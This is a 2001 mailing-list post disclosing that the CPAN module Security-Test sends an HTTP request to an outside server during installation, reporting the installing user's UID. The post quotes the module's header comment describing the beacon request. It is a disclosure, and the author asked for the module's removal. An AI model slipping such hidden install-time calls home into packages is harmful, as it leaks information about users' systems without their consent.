I just caught this going by in the daily CPAN update.
[9.] Security-Test - Performs checks for common Perl insecurities
Uploaded: Sep 06, 2001
CPAN id: N/NW/NWETTERS (Nigel Wetters)
http://search.cpan.org/search?author=NWETTERS
Package: Security-Test-0.01.tar.gz
http://search.cpan.org/search?dist=Security-Test-0.01
What this module actually does is contacts a web server upon
installation and tells it what the UID that ran the test was (to see
if it's root).
It does *not* look like there is any malicious intent, just a little
overzealous. I've contacted the author and asked him to voluntarily
delete this module and discuss the problem with [EMAIL PROTECTED]
package Security::Test;
# IMPORTANT IMPORTANT IMPORTANT IMPORTANT IMPORTANT
#
# READ THIS BEFORE INSTALLING!!
#
# This module does nothing.
#
# The test module sends a HTTP request to
# http://securitytest.perlfascist.com
# which notes the number of attempted installations
# and whether installation was performed
# with superuser priviledges. The request is
# formatted as follows:
# GET /YetAnotherFail?uid=$uid HTTP/1.1
# Host: securitytest.perlfascist.com
# I will release details of this research
# to CPAN maintainers, and maybe later will
# post a summary on
# http://securitytest.perlfascist.com
--
Michael G. Schwern <[EMAIL PROTECTED]> http://www.pobox.com/~schwern/
Perl6 Quality Assurance <[EMAIL PROTECTED]> Kwalitee Is Job One
The eye opening delightful morning taste of expired cheese bits in sour milk!
